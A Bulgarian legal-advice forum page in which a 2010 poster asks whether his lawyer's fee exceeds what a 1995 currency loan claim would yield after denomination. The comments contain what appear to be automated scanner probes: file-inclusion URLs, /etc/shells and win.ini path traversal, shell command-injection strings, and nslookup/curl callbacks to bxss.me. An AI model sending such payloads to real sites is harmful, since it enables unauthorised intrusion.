неправилно изчислен хонорар

11.07.2010г. 03:27:51
Здравейте, Моля да ми отговорите на следния въпрос: На 15.02.2006г.подписах Договор за правна помощ и платих възнаграждение- 3 600лв. на авокатите във връзка със завеждане на гражданско дело за събиране на дължими суми - 36 400 щ.д. и 17 400 ДМ по сключен договор за заем от 25.07. 1995г. Съгласно Договора за заем връщането на дължимите суми е следвало да стане на 25. 09. 1995г. На тази дата котировките на валутите на БНБ са били 47.73 лв. за 1 ДМ и 67.94 Щ.Д. или длъжника ми е дължал 3303518 лв. След деноминацията сумата става 3303.52лв. или при спечелване наделото бих взел по-малко от възнаграждението -3600 лв. Моля Ви да ми отговорите дали съм прав и какви са шансовете ако заведа дело. А.Господинов

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:24
Http://bxss.me/t/fit.txt
lxbfYeaa
05.10.2023г. 07:24
http://bxss.me/t/fit.txt?.jpg
lxbfYeaa
05.10.2023г. 07:24
/etc/shells
lxbfYeaa
05.10.2023г. 07:24
c:/windows/win.ini
lxbfYeaa
05.10.2023г. 07:24
bxss.me
lxbfYeaa
05.10.2023г. 07:24
echo wxmwfo$()\ txvaal\nz^xyu||a #' &echo wxmwfo$()\ txvaal\nz^xyu||a #|" &echo wxmwfo$()\ txvaal\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:24
&echo xtohtl$()\ pyadfx\nz^xyu||a #' &echo xtohtl$()\ pyadfx\nz^xyu||a #|" &echo xtohtl$()\ pyadfx\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:24
|echo ertdnn$()\ kssbmj\nz^xyu||a #' |echo ertdnn$()\ kssbmj\nz^xyu||a #|" |echo ertdnn$()\ kssbmj\nz^xyu||a #
lxbfYeaa
05.10.2023г. 07:24
(nslookup -q=cname hitsyquualdenceb65.bxss.me||curl hitsyquualdenceb65.bxss.me))
lxbfYeaa
05.10.2023г. 07:24
$(nslookup -q=cname hitzowbluualv191de.bxss.me||curl hitzowbluualv191de.bxss.me)

Коментар